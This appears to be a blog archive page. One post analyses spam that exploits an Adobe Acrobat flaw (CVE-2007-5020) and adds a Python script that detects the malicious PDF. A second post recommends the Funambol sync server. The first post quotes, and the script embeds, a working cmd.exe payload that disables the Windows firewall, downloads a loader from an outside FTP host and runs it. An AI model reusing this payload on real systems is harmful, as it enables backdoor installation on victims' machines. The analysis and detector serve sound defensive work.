Archive for the 'integrity' Category

Oct 31

Massive exploitation of the PDF flaw by spam

If you remember, a few weeks ago I wrote a post about a hole in Adobe Acrobat (CVE-2007-5020). It appears that the proof of concept is now being used to mount a massive attack through spam: you receive a mail with a PDF that contains the code to exploit the vulnerability. Since the vulnerability is not very old, I wonder how serious it will become. Remember that Slammer and Code Red used very old vulnerabilities (more than 6 months old). Thus many unpatched copies of Acrobat Reader are probably in the wild.

The current form of the attack is used to install a backdoor. More specifically, the malicious PDF carries a /URI action that does this (SANS analysis):

obj<</URI(mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q "@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&"

In a more understandable form (F-Secure analysis): the mailto: URI is abused to break out of the mail handler and reach cmd.exe, and the exploit then disables the Windows Firewall by issuing the following command:

  • netsh firewall set opmode mode=DISABLE

Then it writes a small FTP script with echo, downloads a file from the following FTP site with ftp -s, and executes it:

  • ftp://203.121.69.116/[REMOVED].exe

This file is detected as Trojan-Downloader.Win32.Small.gkc. Currently, around 32% of the common antivirus products are able to detect it. Sooner or later a new version that directly executes shellcode or worm code will be in the wild, and it will become very nasty, because this time it will not be possible to block the backdoor download point with a firewall. In the meantime, better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall, even if this box is not reachable anymore. Note that this only covers one variant: the SANS sample quoted above already fetches its loader from a different host (81.95.146.130), so the durable fix is to update Adobe Reader/Acrobat rather than rely on the blacklist. Also remember that even if the backdoor is not installed, this exploit still deactivates the XP firewall and therefore may introduce subsequent problems.
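As an added example, not part of the original post or of the SANS/F-Secure analyses, the following Python script triages a PDF for the mailto: /URI pattern described above: it pulls every /URI literal string, flags the traversal-to-cmd.exe indicators, splits the &-chained cmd.exe payload into its individual steps, and recovers the FTP host and loader file from the echo lines that build the ftp -s script. The PDF fragments are constructed for the example (the malicious one is modelled on the SANS payload quoted above, with the quoted host and file name and the defanging spaces removed; the benign one is a plain mailto: link); the indicator names and function names are my own.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample (not a captured file): an uncompressed PDF fragment whose
# OpenAction carries a /URI in the style quoted from the SANS analysis above.
SAMPLE_PDF = b'''1 0 obj
<< /Type /Catalog /OpenAction 2 0 R >>
endobj
2 0 obj
<< /S /URI /URI (mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q "@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&") >>
endobj
'''

# Constructed benign control: ordinary mailto: and http: link actions.
BENIGN_PDF = b'''2 0 obj
<< /S /URI /URI (mailto:security@example.com) >>
endobj
3 0 obj
<< /S /URI /URI (http://example.com/) >>
endobj
'''

# /URI followed by a PDF literal string "( ... )"; "\)" escapes inside are honoured.
URI_RE = re.compile(rb'/URI\s*\(((?:\\.|[^\\)])*)\)', re.DOTALL)

# Indicator names are my own; the patterns come from the payload quoted above.
INDICATORS = (
    ('mailto-scheme',       re.compile(r'^mailto\s*:', re.I)),
    ('percent-path-break',  re.compile(r'%/?\.\.')),           # "%/../" escapes the mailto handler
    ('directory-traversal', re.compile(r'(\.\./){2,}|(\.\.\\){2,}')),
    ('cmd-exe',             re.compile(r'cmd"?\.exe', re.I)),   # the cmd".exe"" quoting trick
    ('firewall-disable',    re.compile(r'netsh\s+firewall\s+set\s+opmode\s+mode\s*=\s*disable', re.I)),
    ('ftp-script-download', re.compile(r'\bftp\s+-s:', re.I)),
)
# A lone mailto: is a normal link; only these make a URI malicious.
STRONG = {'percent-path-break', 'directory-traversal', 'cmd-exe',
          'firewall-disable', 'ftp-script-download'}


def extract_uri_actions(data: bytes) -> List[str]:
    """Return every /URI (...) literal string in raw PDF bytes.

    Handles plain literal strings only: hex strings and objects packed in
    compressed object streams must be decoded before calling this.
    """
    uris = []
    for m in URI_RE.finditer(data):
        raw = m.group(1).replace(b'\\)', b')').replace(b'\\(', b'(').replace(b'\\\\', b'\\')
        uris.append(raw.decode('latin-1'))
    return uris


def indicators_for(uri: str) -> List[str]:
    """Names of the indicator patterns that match this URI."""
    return [name for name, rx in INDICATORS if rx.search(uri)]


def decode_cmd_chain(uri: str) -> List[str]:
    """Split the cmd.exe /c payload into its individual '&'-chained commands.

    The doubled quotes exist only to survive the mailto handler, so they are
    dropped before splitting. ' /c ' is matched with surrounding whitespace so
    the '/c' inside 'system32/cmd' is not mistaken for the switch.
    """
    m = re.search(r'\s/c\s+(?:/q\s+)?', uri, re.I)
    if not m:
        return []
    chain = uri[m.end():].replace('"', '')
    return [c.strip() for c in chain.split('&') if c.strip()]


def ftp_target(commands: List[str]) -> Optional[Tuple[str, str]]:
    """Recover (host, path) from the 'echo o HOST>1' and 'echo get PATH>>1'
    lines that write the script later run with 'ftp -s:1'."""
    host = path = None
    for c in commands:
        m = re.match(r'echo\s+o\s+(\S+?)\s*>', c, re.I)
        if m:
            host = m.group(1)
        m = re.match(r'echo\s+get\s+(\S+?)\s*>', c, re.I)
        if m:
            path = m.group(1)
    return (host, path) if host and path else None


def triage(data: bytes) -> Dict[str, object]:
    """Summarise every suspicious /URI action in the document."""
    findings = []
    for uri in extract_uri_actions(data):
        hits = indicators_for(uri)
        if not STRONG.intersection(hits):
            continue
        cmds = decode_cmd_chain(uri)
        findings.append({
            'indicators': hits,
            'commands': cmds,
            'download': ftp_target(cmds),   # (host, path) to block or hunt for
            'disables_firewall': 'firewall-disable' in hits,
        })
    return {'malicious': bool(findings), 'findings': findings}


if __name__ == '__main__':
    for name, blob in (('sample', SAMPLE_PDF), ('benign', BENIGN_PDF)):
        print(name, triage(blob))
```

The script works on raw bytes on purpose, so it runs on a mail attachment without a PDF library; the trade-off is that it only sees uncompressed literal strings, so a sample that hides its action dictionary inside a FlateDecode object stream has to be inflated first. The recovered (host, path) pair is what you would feed to the firewall blacklist or to a proxy log search, and the per-command breakdown makes it obvious when a variant changes the download method rather than just the address.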

Oct 19

Funambol: Free Open Source sync server for smartphone

Besides the obvious phone function, a smartphone also lets you carry your personal data such as contacts, meetings and so on. Of course you have to sync it with your computer for backup and replication. However, when you seek to do it while traveling, or want to have multiple devices synced (let's say your office computer, your laptop and a web calendar), things get tricky, moreover if your office computer is, like mine, under Linux. The natural solution is to have a sync server. However, until now, the two available options were not what I was looking for.

First, using a third-party service. Here confidentiality and availability are an issue for me. I am sorry, but these files are too personal; I don't trust a third party here. Even my phone company Orange. Sorry guys.

The other option was to have an Exchange server (my phone is a Windows Mobile), and I want to stick with this technology because it works like I want. I in fact plan to have a TyTN II as my next phone. This was not an option because the server I have, the one used to host this blog in fact, runs Linux and I am not going to change that either.

So until now I was pretty stuck, but I may have found my holy grail: an open source sync server. Take a look at it here:

Funambol: Open Source sync server

It also supports the iPhone :) I really don't know how I missed this software. Anyway, I will give it a try in the next few days. Has anyone already tried it?